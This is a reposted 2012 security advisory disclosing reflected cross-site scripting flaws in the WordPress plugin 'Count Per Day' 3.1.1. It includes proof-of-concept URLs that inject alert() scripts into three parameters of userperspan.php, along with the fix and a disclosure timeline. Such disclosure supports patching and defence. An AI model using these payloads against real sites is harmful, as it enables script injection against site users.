Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Jrobalian CMS SQL Injection Vulnerability

  CakePHP 2.x-2.2.0-RC2 XXE Injection

  MGB OpenSource Guestbook 0.6.9.1 Multiple security vulnerabilities

  Event Calendar PHP 1.2 - Multiple Web Vulnerabilites

From:sschurtz_(at)_darksecurity.de <sschurtz_(at)_darksecurity.de>
Date:23 июля 2012 г.
Subject:WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities

Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on 'Count Per Day' 3.1.1
Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day
Vendor Status: fixed

==========================
Vulnerability Description
==========================

The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.
php?page="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.
php?page="/><script>alert(/xss/)</script>

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.
php?datemin="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.
php?datemin="/><script>alert(/xss/)</script>

http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.
php?datemax="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.
php?datemax="/><script>alert(/xss/)</script>

=========
Solution
=========

Upgrade to the latest version 3.2

====================
Disclosure Timeline
====================

29-Jun-2012 - vendor informed (contact form)
02-Jul-2012 - verified by Meistar
03-Jul-2012 - feedback from developer
14-Jul-2012 - fixed by developer

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://wordpress.org/extend/plugins/count-per-day/changelog/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород